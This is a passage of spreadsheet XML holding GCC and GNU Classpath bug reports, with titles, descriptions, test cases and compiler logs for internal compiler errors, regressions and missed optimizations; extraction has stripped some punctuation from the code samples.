0xda6bb8 copy_body
	../../gcc/tree-inline.c:2965
0xdac4c0 expand_call_inline
	../../gcc/tree-inline.c:4664
0xdac4c0 gimple_expand_calls_inline
	../../gcc/tree-inline.c:4804
0xdac4c0 optimize_inline_calls(tree_node*)
	../../gcc/tree-inline.c:4944
0x1418e8c early_inliner(function*)
	../../gcc/ipa-inline.c:2695
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>matthias.hochsteger</t>
  </si>
  <si>
    <t>GCC-11928</t>
  </si>
  <si>
    <t>[3.3.1/3.4 regression] c++ typedef handling</t>
  </si>
  <si>
    <t>[forwarded from http://bugs.debian.org/205402]
g++-3.3 fails to compile the code in test.cc with the following message: 
test.cc: In function `int main(int char**)':
test.cc:22: error: conversion from `BClass' to `B*' is ambiguous
test.cc:16: error: candidates are: BClass::operator B*()
test.cc:9: error:                 AClass::operator A*()
Although it correctly compiles the equivalent code in test2.cc
--- begin test.cc ---
typedef struct _A A
typedef struct _A B
void some_function(B *b)
class AClass {
public:
  operator A*() { return 0}
}
class BClass :public AClass {
public:
  operator B*() { return 0}
}
int main(int argc char **argv) {
  BClass b
  some_function(b)
}
--- end test.cc ---
--- begin test2.cc ---
void some_function(struct _A *b)
class AClass {
public:
  operator struct _A*() { return 0}
}
class BClass :public AClass {
public:
  operator struct _A*() { return 0}
}
int main(int argc char **argv) {
  BClass b
  some_function(b)
}
--- end test2.cc ---</t>
  </si>
  <si>
    <t>GCC-66223</t>
  </si>
  <si>
    <t>[5 Regression] Diagnostic of pure virtual function call broken including __cxa_pure_virtual</t>
  </si>
  <si>
    <t>Consider this small and certainly broken program:
    struct B {
        B* self
        B() : self( this ) { self-&gt;f() }
        virtual void f() = 0
    }
    struct D : B
    {
        void f() {}
    }
    int main()
    {
        D d
    }
The ctor of B calls (indirectly) the pure virtual function f() but the vtbl is still from B not D (yet). Hence the program crashes. With GCC 4.9 I got:
    &gt; ./a.out
    pure virtual method called
    terminate called without an active exception
    Aborted (core dumped)
    &gt;
Which is a good hint and I got a core dump. Fine so far. With GCC 5.1 I get this:
    &gt; ./a.out
    Segmentation fault (core dumped)
    &gt;
Which is certainly less helpful.
What is actually a lot worse is that even __cxa_pure_virtual is severly broken. I used to have my own __cxa_pure_virtual method to provide more output including a backtrace something like this was my output for GCC 4.9:
    &gt; ./a.out
    ### EMERGENCY ###
    pure virtual function called
    ### BACKTRACE ###
    build/release/test/emergency/pure_virtual_XFAIL(coin::core::output::backtrace()+0x23) [0x4034a3]
    build/release/test/emergency/pure_virtual_XFAIL(__cxa_pure_virtual+0x47) [0x4031f7]
    build/release/test/emergency/pure_virtual_XFAIL() [0x402a09]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf5) [0x7ff9dd52dec5]
    build/release/test/emergency/pure_virtual_XFAIL() [0x402b14]
    ### ABORTING ###
    Aborted (core dumped)
    &gt;
After the backtrace was printed to stdout a core dump was written. With GCC 5.1 all I get is:
    &gt; ./a.out
    &gt;
where at least the result code is not 0 (it's 128 if it helps). But no message and no core dump.
Further experiments have shown that GCC 5.1 actually calls the terminate handler (which I also registered via std::set_terminate). This handler prints a backtrace and some other information when called on other errors but for a pure virtual call it seems to be unable to even call a simple write() to stdout.
Please let me know if you need further help to debug and fix this problem. I realize it's just a diagnostic in case of calling an unimplemented pure virtual method which should not be done in the first place but I think the current situation is really hurting people when there is absolutely no message and no core dump and the process just returns with a non-zero exit code.</t>
  </si>
  <si>
    <t>GCC-52840</t>
  </si>
  <si>
    <t>bootstrap fails in libstdc++ missing compatibility.lo</t>
  </si>
  <si>
    <t>git clone @ svn r186099
Happens since about 2 weeks.
Host == Build == Target == x86_64-linux-gnu
../../src/gcc-4.8.orig/configure -v --enable-languages=all LD=/usr/bin/ld.bfd 
CFLAGS=-O2 -g3 -ggdb3 CXXFLAGS=-O2 -g3 -ggdb3 BOOT_CFLAGS=-O2 -g3 -ggdb3 BOOT_CXXFLAGS=-O2 -g3 -ggdb3 CFLAGS_FOR_TARGET=-O2 -g3 -ggdb3 CXXFLAGS_FOR_TARGET=-O2 -g3 -ggdb3 --prefix=/opt/x86_64/gcc-4.8.orig/ --enable-shared --with-system-zlib --libexecdir=/opt/x86_64/gcc-4.8.orig/lib --enable-nls --without-included-gettext --enable-threads=posix --program-suffix=-4.8.orig-HEAD --enable-__cxa_atexit --enable-libstdcxx-allocator=mt --enable-clocale=gnu --enable-libstdcxx-debug --enable-mpfr --disable-werror --enable-checking=yes --enable-debug -C --disable-intermodule --disable-libstdcxx-pch --enable-multilib --enable-checking=release
[...]
libtool: link: ranlib .libs/libc++11convenience.a
libtool: link: ( cd .libs &amp;&amp; rm -f libc++11convenience.la &amp;&amp; ln -s ../libc++11convenience.la libc++11convenience.la )
make[8]: Leaving directory `/scratch/obj.x86_64/gcc-4.8.orig/x86_64-unknown-linux-gnu/libstdc++-v3/src/debug/c++11'
make[8]: Entering directory `/scratch/obj.x86_64/gcc-4.8.orig/x86_64-unknown-linux-gnu/libstdc++-v3/src/debug'
make[8]: *** No rule to make target `compatibility.lo' needed by `libstdc++.la'.  Stop.
make[8]: Leaving directory `/scratch/obj.x86_64/gcc-4.8.orig/x86_64-unknown-linux-gnu/libstdc++-v3/src/debug'
make[7]: *** [all-recursive] Error 1</t>
  </si>
  <si>
    <t>GCC-15092</t>
  </si>
  <si>
    <t>g77 ICE on compilation of COMPLEX expression</t>
  </si>
  <si>
    <t>The result of optimizing the complex-valued C1+C1 expression causes the ICE.
#cat /tmp/test.f
      COMPLEX C1C2
      C1=(1.0.)
      C2=C1+C1
      END
#g77 -v -c /tmp/test.f
Reading specs from /usr/local/lib/gcc/powerpc-apple-darwin6.6/3.4/specs
Configured with: ../gcc-3.4-20030806/configure --prefix=/usr/local --enable-languages=f77 --
infodir=/usr/local/share/info : (reconfigured) ../gcc-3.4-20030806/configure --prefix=/usr/local 
--enable-languages=cf77 --infodir=/usr/local/share/info --with-gcc-version-trigger=/usr/
local/src/gcc-3.4-20030806/gcc/version.c
Thread model: posix
gcc version 3.4 20030806 (experimental)
 /usr/local/libexec/gcc/powerpc-apple-darwin6.6/3.4/f771 /tmp/test.f -fPIC -quiet -dumpbase 
test.f -auxbase test -version -o /var/tmp//ccr8ZL9a.s
GNU F77 version 3.4 20030806 (experimental) (powerpc-apple-darwin6.6)
        compiled by GNU C version 3.4 20030806 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
/tmp/test.f: In program `MAIN__':
In file included from /tmp/test.f:0:
/tmp/test.f:4: internal compiler error: in gen_lowpart at emit-rtl.c:1374
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-46614</t>
  </si>
  <si>
    <t>[4.5 Regression] gcc.dg/vect/vect-strided-u8-i8-gap4.c FAILs with -fno-rename-registers -fsched2-use-superblocks</t>
  </si>
  <si>
    <t>Flags:
-O2 -fno-rename-registers -fsched2-use-superblocks -ftree-vectorize -funroll-loops
or
-O -fgcse -fno-rename-registers -fsched2-use-superblocks -fschedule-insns2 -ftree-vectorize -funroll-all-loops
Output:
$ gcc -O -fgcse -fno-rename-registers -fsched2-use-superblocks -fschedule-insns2 -ftree-vectorize -funroll-loops vect-strided-u8-i8-gap4.i
$ valgrind -q ./a.out 
==7908== Conditional jump or move depends on uninitialised value(s)
==7908==    at 0x400CBB: main1 (vect-strided-u8-i8-gap4.c:45)
==7908==    by 0x401862: main (vect-strided-u8-i8-gap4.c:96)
==7908== 
Aborted
Tested revisions:
r167054 - fail
r158095 - fail
r153685 - OK
4.5 r166509 - fail
4.4 r166509 - OK</t>
  </si>
  <si>
    <t>GCC-710</t>
  </si>
  <si>
    <t>Broken link on your web page</t>
  </si>
  <si>
    <t>On http://gcc.gnu.org/thanks.html the link labelled table of contents
is broken.
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-2603</t>
  </si>
  <si>
    <t>out-of-date .class file warning message does not specify filename</t>
  </si>
  <si>
    <t>gcj -g -fno-bounds-check  -o obj/FECFileTest.o -c ../../FEC/tests/FECFileTest.java 
../../FEC/tests/FECFileTest.java:2: warning: Source file for class `com.swarmcast.fec.io' is newer than its matching class file. Source file used instead
In this example a dependency of FECFileTest.java was
present as an (out-of-date) .class file and a (current) .java file.  The class name is not given as claimed.
Instead the package of the class is given.
Release:
gcc 3.0 branch
Environment:
rh 7 linux gcc 3.0 branch current revision 20 Apr 2001
How-To-Repeat:
create two .java files one depending on the other.
compile the prior file to a .class file.  touch the .java
file for that class afterwards.  now compile the dependent
.java file</t>
  </si>
  <si>
    <t>GCC-64351</t>
  </si>
  <si>
    <t>std::uniform_real_distribution(0 1) returns 1</t>
  </si>
  <si>
    <t>I'm seeing std::uniform_real_distribution(0 1) return 1 even though the standard seems to say it shouldn't:
A uniform_real_distribution random number distribution produces random numbers x a â‰¤ x &lt; b
(I looked at the draft available here: http://www.open-std.org/JTC1/SC22/WG21/ or specifically here: http://www.open-std.org/JTC1/SC22/WG21/docs/papers/2011/n3242.pdf)
There is a relatively minimal working example you can try here:
http://coliru.stacked-crooked.com/a/4ca5b4ac05e990ff
Or if you prefer to see the code directly:
// This program outputs 1 but uniform_real_distribution is supposed
// to return values in [0 1) (the half open interval).
#include 
#include 
#include 
int main()
{
    std::mt19937 rng(8890)
	std::uniform_real_distribution dist
	uint64_t num_1 = 0
	for (uint64_t i = 0 i &lt; 39975715 ++i)
	{
		if (dist(rng) == 1.f) 
			++num_1
	}
    std::cout &lt;&lt; num_1 &lt;&lt; std::endl
	return 0
}
Note that there is a related note in this bug report: 
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=43660#c2</t>
  </si>
  <si>
    <t>GCC-40676</t>
  </si>
  <si>
    <t>[4.5 Regression] internal compiler error: verify_ssa error: definition in block 5 does not dominate use in block 7</t>
  </si>
  <si>
    <t>extracted from Wine
/home/marcus/projects/gcc.trunk/BIN/bin/gcc -c  -O2   dialog.i 
dialog.i: In function 'xmsi_dialog_create':
dialog.i:33:1: error: definition in block 5 does not dominate use in block 7
for SSA_NAME: .MEM_21 in statement:
# VUSE 
D.2749_15 = *szDialogName_13
dialog.i:33:1: internal compiler error: verify_ssa failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-39226</t>
  </si>
  <si>
    <t>[4.4/4.5 Regression] gcc_assert (verify_initial_elim_offsets ()) ICE</t>
  </si>
  <si>
    <t>/* { dg-do compile } */
/* { dg-options -O2 } */
/* { dg-options -O2 -mtune=cell -mminimal-toc { target { powerpc*-*-* &amp;&amp; lp64 } } } */
struct A
{
  char *a
  unsigned int b : 1
  unsigned int c : 31
}
struct B
{
  struct A *d
}
void
foo (struct B *x unsigned long y)
{
  if (x-&gt;d[y].c)
    return
  if (x-&gt;d[y].b)
    x-&gt;d[y].a = 0
}
ICEs with -m64 -O2 -mtune=cell -mminimal-toc as elimination offsets change.</t>
  </si>
  <si>
    <t>GCC-48478</t>
  </si>
  <si>
    <t>Array-constructor with type-spec: reject valid/accept invalid</t>
  </si>
  <si>
    <t>Created attachment 23898
Demonstrates valid and invalid syntax
gfortran 4.7 compiled from trunk revision 171951 rejects an array constructor with syntax:
  [ derived_type_name:: ... ]
With -Wall --std=f2003 it accepts without complaint one of the form:
  [ TYPE(derived_type_name):: ... ]
From F2008 draft:
R468: array-constructor  is (/ ac-spec /) 
                         or lbracket ac-spec rbracket
R469: ac-spec            is type-spec ::
                         or [type-spec ::] ac-value-list
R402: type-spec          is intrinsic-type-spec
                         or derived-type-spec
R453: derived-type-spec  is type-name [(type-param-spec-list)]
It looks like the compiler has confused a type-spec with a declaration-type-spec (which does use the TYPE keyword).</t>
  </si>
  <si>
    <t>GCC-31150</t>
  </si>
  <si>
    <t>[4.2/4.3/4.4 Regression] Not promoting an whole array to be static const</t>
  </si>
  <si>
    <t>Take:
int main()
{
  char str[2][34] = {ab}
  __builtin_puts(str[0])
  return 0
}
In 4.0.2 we used to get:
  static char C.0[2][34] = {a b}
      char str[2][34]
      str = C.0
      __builtin_puts (
But in 4.1.1 and above we get:
  char str[2][34]
  str = {}
  str[0] = a
  str[1] = b
Which causes us to first zero out the array and then do load/stores on the stack.</t>
  </si>
  <si>
    <t>GCC-55728</t>
  </si>
  <si>
    <t>std::bad_function_call has misleading what() result</t>
  </si>
  <si>
    <t>cat t.cc &lt;&lt; EOF
#include 
#include 
int main()
{
  try
  {
    std::function()()
  }
  catch( std::exception const&amp; e )
  {
    std::cout &lt;&lt; e.what() &lt;&lt; std::endl
  }
}
EOF
g++ -std=c++11 -o t t.cc
t
# gives me std::exception
Not wrong but std::bad_function_call would have saved me some debug time.</t>
  </si>
  <si>
    <t>GCC-10864</t>
  </si>
  <si>
    <t>Unreadable error message for no match for 'A &lt; B' operator if AB are templates</t>
  </si>
  <si>
    <t>This startled me since I didn't see exactly what gcc
was complaining about -- I had code like
------------------------------
#include 
#include 
template  struct less {
  bool foo () { return T() &lt; T() }
}
template  class X {}
template struct less
                       std::vector &gt; &gt;
-----------------------
(In fact it was even a little more complicated...). gcc
gives the following message (on mainline):
g/x&gt; /home/bangerth/bin/gcc-3.4-pre/bin/c++ -c y.cc
y.cc: In member function `bool less::foo() [with T =
   X &gt;
   std::vector &gt; &gt;]':
y.cc:10:   instantiated from here
y.cc:5: error: no match for `X&lt;std::vector&lt;std::string
   std::allocator &gt; std::vector&lt;std::string
   std::allocator &gt; &gt; &lt; X&lt;std::vector&lt;std::string
   std::allocator &gt; std::vector&lt;std::string
   std::allocator &gt; &gt;' operator
Now that's pretty hard to read. What it says is:
  no match for `A &lt; B' operator
but the &lt; is totally lost in all these template args.
I also always thought that the message was somehow
truncated since usually in C++ there must be something
after the operator :-)
I think it would be nice if the message could be changed
to read like
  no match for operator&lt; in expression `A &lt; B'
That way it would be simpler to figure out which operator
exactly is missing.
W.
PS: As a heads up: this is what 2.95 produces on above 
code which is way worse since it even states the
template args of the typedef expansion of std::string...
g/x&gt; c++ -c y.cc
y.cc: In method `bool less__default_alloc_template &gt;allocator__default_alloc_template &gt; &gt; &gt;vector&lt;basic_string&lt;charstring_char_traits&lt;char
Release:
unknown
Environment:
present mainline
Unformatted:
 &gt;__default_alloc_template &gt;allocator__default_alloc_template &gt; &gt; &gt; &gt; &gt;::foo()':
 y.cc:10:   instantiated from here
 y.cc:5: no match for `X__default_alloc_template &gt;allocator__default_alloc_template &gt; &gt; &gt;vector__d efault_alloc_template &gt;allocator__default_alloc_template &gt; &gt; &gt; &gt; __default_alloc_template &gt;allocator__default_alloc_template &gt; &gt; &gt;vector__default_alloc_template &gt;allocator__default_alloc_template &gt; &gt; &gt; &gt;'</t>
  </si>
  <si>
    <t>CLASSPATH-24495</t>
  </si>
  <si>
    <t>JAWT Lock/Unlock(JNIEnv *env) are not re-entrant (unlike SUN's implementation)</t>
  </si>
  <si>
    <t>I ran across this problem while testing LWJGL (http://lwjgl.org) with GCJ 4.0.2 on my SUSE 10 laptop.
It seems that the global AWT locking exposed in the JAWT struct in GCJ is not re-entrant.  While I can't find a specification that defines this lock to be re-entrant this behaviour is nevertheless unfortunate since the SUN VM implementation of the lock is re-entrant. The actual code that triggers this problem is deep within the LWJGL CVS but here's a snippet to help me illustrate the problem:
    JAWT jawt
    jawt.version = JAWT_VERSION_1_4
    if (JAWT_GetAWT(env &amp;jawt) != JNI_TRUE) {
        // error handling
        return
    }
    jawt.Lock(env)
    // Lock AWT a second time from the same thread will hang if using GCJ
    if (JAWT_GetAWT(env &amp;jawt) != JNI_TRUE) {
        // error handling
        return
    }
    jawt.Lock(env)
The second locking attempt from the same thread will succeed on a SUN vm while it will hang if running GCJ indicating that the GCJ implementation is not re-entrant.
I worked around the problem in LWJGL by keeping track of the thread that owns the AWT lock and a locking count ensuring that the AWT lock is only grabbed once even in the re-entrant case.</t>
  </si>
  <si>
    <t>naur</t>
  </si>
  <si>
    <t>GCC-21734</t>
  </si>
  <si>
    <t>[4.1 regression] ICE: -ftree-vectorize segfault</t>
  </si>
  <si>
    <t>Segfault on compilation of following source:
struct _matrix {
  double lineardata[4 * 4]
  double &amp; operator()(int row int col = 0) {
    return lineardata[col * 4 + row]
  }
}
struct matrix : public _matrix {
  typedef _matrix parent
  double &amp; operator()(int row int col = 0)
    { return parent::operator()(rowcol) }
}
void add(matrix &amp; __restrict in1 matrix &amp; __restrict in2 matrix &amp; __restrict
result) {
  for (int col=0 col&lt;4 ++col)
    for (int row=0 row&lt;4 ++row)
      result(row col) = in1(row col) + in2(row col)
}
--- end of source ---
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: /esat/alexandria1/sderoeck/src/gcc/main/configure
--prefix=/esat/olympia/install --program-suffix=-cvs --enable-languages=cc++
Thread model: posix
gcc version 4.1.0 20050523 (experimental)
 /esat/olympia/install/libexec/gcc/i686-pc-linux-gnu/4.1.0/cc1plus -quiet -v
-I/users/visics/sderoeck/projects/clean/CaveIn/Whistler -D_GNU_SOURCE test13.cpp
-quiet -dumpbasetest13.cpp -march=pentium4 -auxbase-strip test13.S -O9 -version
-fverbose-asm -fdump-tree-vect-stats -fdump-tree-vect-details -funroll-all-loops
-ftree-vectorize -o test13.S
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory
/esat/olympia/install/lib/gcc/i686-pc-linux-gnu/4.1.0/../../../../i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /users/visics/sderoeck/projects/clean/CaveIn/Whistler
 /esat/olympia/install/lib/gcc/i686-pc-linux-gnu/4.1.0/../../../../include/c++/4.1.0
 /esat/olympia/install/lib/gcc/i686-pc-linux-gnu/4.1.0/../../../../include/c++/4.1.0/i686-pc-linux-gnu
 /esat/olympia/install/lib/gcc/i686-pc-linux-gnu/4.1.0/../../../../include/c++/4.1.0/backward
 /esat/olympia/install/include
 /esat/olympia/install/lib/gcc/i686-pc-linux-gnu/4.1.0/include
 /usr/include
End of search list.
GNU C++ version 4.1.0 20050523 (experimental) (i686-pc-linux-gnu)
        compiled by GNU C version 4.1.0 20050523 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 99f1919b6616caa4cacd62f3245b1e14
test13.cpp: In function 'void add(matrix&amp; matrix&amp; matrix&amp;)':
test13.cpp:14: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-61556</t>
  </si>
  <si>
    <t>[c++11][4.9/4.10 Regression] â€˜*(const ValueType*)thisâ€™ is not a constant expression with valid code</t>
  </si>
  <si>
    <t>When used in a certain way a template class cannot be instantiated in another template class using a static constexpr. I tracked the regression down to the following commit:
commit 18619da58c77461642c36cee9f0463c968877f75
Author: jason 
Date:   Mon Apr 1 19:05:12 2013 +0000
        * call.c (add_function_candidate): Take the address of 'this' here.
        (build_over_call): And here.
        (build_new_method_call_1 build_op_call_1): Not here.
        (build_user_type_conversion_1): Or here.
        (add_candidates): Adjust.
Reverting this commit fixes the problem on the current gcc.
The problematic code that should be compilable is attached after the CODE section.
When compiled with gcc 4.9.0 the
ValueTypeInfo v in the FillFunctor
constructor gives an error:
    bug2.cpp: In constructor â€˜FillFunctor::FillFunctor()â€™:
    bug2.cpp:24:41:   in constexpr expansion of â€˜const
ValueType{1}-&gt;ValueType::operator int()â€™
    bug2.cpp:24:41: error: â€˜*(const ValueType*)thisâ€™ is not a constant
expression
       ValueTypeInfo v
            ^
    bug2.cpp:24:41: note: in template argument for type â€˜intâ€™
    bug2.cpp:24:44: error: invalid type in declaration before â€˜â€™ token
       ValueTypeInfo v
However the same expression compiles just fine if its used in a
function such as main(). Removing m_ID makes the code compile too.
Also the compilation works after replacing:
  ValueTypeInfo v
with a:
  constexpr ValueType doubleval = ValueType(1)
  ValueTypeInfo v
CODE
#####
class ValueType {
public:
    constexpr operator int() const {return m_ID}
    constexpr ValueType(const int v)
        : m_ID(v) {}
private:
    int m_ID
}
class ValueTypeEnum {
public:
    static constexpr ValueType doubleval = ValueType(1)
}
template 
class ValueTypeInfo {
}
template 
class FillFunctor {
public:
    FillFunctor() {
        ValueTypeInfo v
    }
}
int main() {
    ValueTypeInfo v
}</t>
  </si>
  <si>
    <t>GCC-4549</t>
  </si>
  <si>
    <t>inf. loop compiling bad code</t>
  </si>
  <si>
    <t>compiler goes into inf. loop on this code:
// begin /////////////////
struct ArrWrap {
  int arr[2]
}
class Summat {
public:
  Summat() : m_wrap((ArrWrap){{0 1}}) {}
  ArrWrap m_wrap
}
int main()
{
  ArrWrap wrap
  wrap = {{0 1}}
}
Summat::Summat()
{
  m_wrap = {{0 1}}
}
// end /////////////////////////
Release:
3.0.1
Environment:
Linux 2.4.7-64GB-SMP #1 SMP Tue Jul 24 15:26:03 GMT 2001 i686 unknown
How-To-Repeat:
jdonner@goliath Common/Util&gt; g++ -v -save-temps -W -Wall foodle.cpp
Reading specs from /usr/local/gcc301/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/specs
Configured with: /home/jdonner/mkgcc3/gcc-3.0.1/configure --enable-threads=posix --prefix=/usr/local/gcc301
Thread model: posix
gcc version 3.0.1
 /usr/local/gcc301/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/cpp0 -lang-c++ -D__GNUG__=3 -D__GXX_DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=1 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__l
inux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -W -Wall -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ foodle.cpp foodle.ii
GNU CPP version 3.0.1 (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /opt/oracle/rdbms/public
ignoring nonexistent directory /opt/oracle/rdbms/public
ignoring nonexistent directory /opt/oracle/rdbms/public
ignoring nonexistent directory /opt/oracle/rdbms/public
ignoring nonexistent directory /opt/oracle/rdbms/public
ignoring nonexistent directory /usr/local/gcc301/i686-pc-linux-gnu/include
ignoring duplicate directory /usr/local/qt/include
ignoring duplicate directory /usr/local/qt/include
ignoring duplicate directory /usr/local/qt/include
ignoring duplicate directory /usr/local/qt/include
#include ... search starts here:
#include  search starts here:
 /usr/local/qt/include
 /usr/local/gcc301/include/g++-v3
 /usr/local/gcc301/include/g++-v3/i686-pc-linux-gnu
 /usr/local/gcc301/include/g++-v3/backward
 /usr/local/include
 /usr/local/gcc301/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/include
 /usr/include
End of search list.
 /usr/local/gcc301/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/cc1plus -fpreprocessed foodle.ii -quiet -dumpbase foodle.cpp -W -Wall -version -o foodle.s
GNU CPP version 3.0.1 (cpplib) (i386 Linux/ELF)
GNU C++ version 3.0.1 (i686-pc-linux-gnu)
        compiled by GNU C version 3.0.1.
foodle.cpp:7: parse error before `)' token
foodle.cpp:7: missing '' before right brace
foodle.cpp: In constructor `Summat::Summat()':
foodle.cpp:7: parse error before `m_wrap'
... have to ^C
I built this compiler with make -j 2 if that has anything
to do with it...</t>
  </si>
  <si>
    <t>jdonner</t>
  </si>
  <si>
    <t>GCC-24053</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE in build_int_cst_wide at tree.c:795</t>
  </si>
  <si>
    <t>On x86 and x86_64 started between
LAST_UPDATED: Fri Sep 23 22:29:25 UTC 2005
LAST_UPDATED: Sun Sep 25 08:26:26 UTC 2005
stage1/xgcc -Bstage1/
-B/home/guerby/work/gcc/install/install-20050925T102808/x86_64-unknown-linux-gnu/bin/
-c -g -O2      -gnatpg -gnata -I- -I. -Iada
-I/home/guerby/work/gcc/version-head/gcc/ada
/home/guerby/work/gcc/version-head/gcc/ada/osint.adb -o ada/osint.o
+===========================GNAT BUG DETECTED==============================+
| 4.1.0 20050925 (experimental) (x86_64-unknown-linux-gnu) GCC error:      |
| in build_int_cst_wide at tree.c:795                                     |
| Error detected at osint.adb:2822:12                                      |</t>
  </si>
  <si>
    <t>GCC-38442</t>
  </si>
  <si>
    <t>Multi-line description used in config/picochip/picochip.opt</t>
  </si>
  <si>
    <t>According to bug 34352 comment 1 it is incorrect for descriptions in .opt files to span multiple lines.  In version 4.4-20081121 there is such a case in config/picochip/picochip.opt:
   msymbol-as-address
   Target Mask(SYMBOL_AS_ADDRESS)
   Allow a symbol value to be used as an immediate value in an
   instruction.</t>
  </si>
  <si>
    <t>GCC-60439</t>
  </si>
  <si>
    <t>No warning for case overflow in switch statement.</t>
  </si>
  <si>
    <t>For the switch statement in the function f2 the controlling expression is either 1 or 0 and the first case 1111 exceeds the max value. 
$: cat s.c
int f1(char c) {
  switch(c) {
  case 111111: return 1 /*warning here*/
  default: return 0
  }
}
int f2(char c char d) {
  switch(c &amp;&amp; d) {
  case 1111: return 1 /*no warning here*/
  default: return 0
  }
}
$: gcc-trunk -c s.c 
s.c: In function â€˜f1â€™:
s.c:3:3: warning: case label value exceeds maximum value for type
   case 111111: return 1 /*warning here*/
   ^</t>
  </si>
  <si>
    <t>GCC-21508</t>
  </si>
  <si>
    <t>non-optimal code with __builtin_signbit</t>
  </si>
  <si>
    <t>This testcase:
int test (double a) {
        return __builtin_signbit (a + 1.0)
}
produces quite non-optimal code when compiled with '-O2' (-fomit-frame-pointer):
test:
        subl    $12 %esp
!       xorl    %eax %eax
!       movl    $1072693248 %edx
!       movl    %eax (%esp)
!       movl    %edx 4(%esp)
!       fldl    (%esp)
        faddl   16(%esp)
        fstpl   (%esp)
?       movl    4(%esp) %edx
        addl    $12 %esp
?       movl    %edx %eax
        andl    $-2147483648 %eax
        ret
Instructions marked with (!) could be replaced with a fld1.
Instructions marked with (?) could be replaced with a movl 4(%esp) %eax.
Perhaps fxam could be used in this case? Then the code would look something like:
fldl   4(%esp)
fxam
fnstsw %ax
fstp   %st(0)
andl   0x02 %eax
ret</t>
  </si>
  <si>
    <t>GCC-54123</t>
  </si>
  <si>
    <t>inline functions not optimized as well as static inline</t>
  </si>
  <si>
    <t>Created attachment 27891
test case source code
GCC does not optimize a function declared 'inline' as well as it
optimizes the same function declared 'static inline'.  There is no
reason to optimize differently depending on whether an inline function
is static.
I discovered this problem when using GCC 4.7.1 to compile a test
version of GNU Emacs that uses extern inline functions.
This is a regression from GCC 4.6.3 which optimizes equally well in
both cases.
I enclose a small example of the problem.  With GNU Emacs I found many
more like this and the size of the GNU Emacs text segment grew by
0.9% when compiled to use extern inline rather than static inline
functions.
To reproduce the problem process the attached program xml-bug1.c as
follows.  (I'll also attach xml-static-inline.s and xml-inline.s.)
  gcc -std=gnu99 -O2 -S -DINLINE='static inline' -o xml-static-inline.s xml-bug1.c
  gcc -std=gnu99 -O2 -S -DINLINE='inline' -o xml-inline.s xml-bug1.c
  diff -u xml-static-inline.s xml-inline.s
The diff output will read as follows.  Notice that xml-inline.s
contains an extra instruction 'cmpq Qnil(%rip) %r12' that
xml-static-inline.s does not.  The code is correct but it's not
optimized as well as it should be.
--- xml-static-inline.s	2012-07-29 13:39:24.254184691 -0700
+++ xml-inline.s	2012-07-29 13:49:01.555043179 -0700
@@ -2386 +2387 @@
 .L40:
 	cmpq	Qnil(%rip) %r12
 	je	.L51
+.L69:
 	movq	%r12 %rax
 	movq	Qstringp(%rip) %rdi
 	andl	$7 %eax
@@ -34213 +3438 @@
 	ret
 	.p2align 410
 	.p2align 3
-.L51:
-	.cfi_restore_state
-	movl	$.LC1 %r13d
-	jmp	.L41
-	.p2align 410
-	.p2align 3
 .L68:
+	.cfi_restore_state
 	movq	%r12 %rdi
 	call	xmlDocGetRootElement
 	testq	%rax %rax
@@ -3638 +35914 @@
 	movq	%rsi %rdi
 	movq	%rsi 8(%rsp)
 	call	move_gap
+	cmpq	Qnil(%rip) %r12
 	movq	8(%rsp) %rsi
-	jmp	.L40
+	jne	.L69
+	.p2align 410
+	.p2align 3
+.L51:
+	movl	$.LC1 %r13d
+	jmp	.L41
 .L66:
 	movq	%rax %rdx
 	jmp	.L45</t>
  </si>
  <si>
    <t>eggert</t>
  </si>
  <si>
    <t>GCC-38768</t>
  </si>
  <si>
    <t>-fschedule-insns documentation is wrong for x86 and some other targets</t>
  </si>
  <si>
    <t>according to the manpage -fschedule-insns is enabled at the optimization levels -O2 -O3 and -Os. according to g++ -c -Q --help=optimizers this is not the case though.</t>
  </si>
  <si>
    <t>GCC-53252</t>
  </si>
  <si>
    <t>Missed shrink wrapping opportunity</t>
  </si>
  <si>
    <t>Compile the attached code with -O3 -fprofile-generate run the resulting executable then compile again with -O3 -fprofile-use.
Ideally the fast path through main_func would just do something like
test %dil%dil
jnz 
xor %eax%eax
ret
Unfortunately we're getting frame setup/teardown in the fast path.
testcode:
#include 
volatile long x = 13
void bar(long v)
{
	printf(l = %li\n v)
}
long foo(long l)
{
	for (int i = 0 i != x ++i)
	{
		l *= l ^ 47110815
		bar(l)
	}
	return l
}
int main_func(bool b) __attribute__((noinline))
int main_func(bool b)
{
	int ret = 0
	if (b)
	{
		for ( int i = 0 i != 1000 ++i )
			ret += foo(i)
	}
	return ret
}
int main( int argc char** argv)
{
	return main_func(argc != 1)
}</t>
  </si>
  <si>
    <t>GCC-57652</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9 Regression] collect2 does not clean up temporary files</t>
  </si>
  <si>
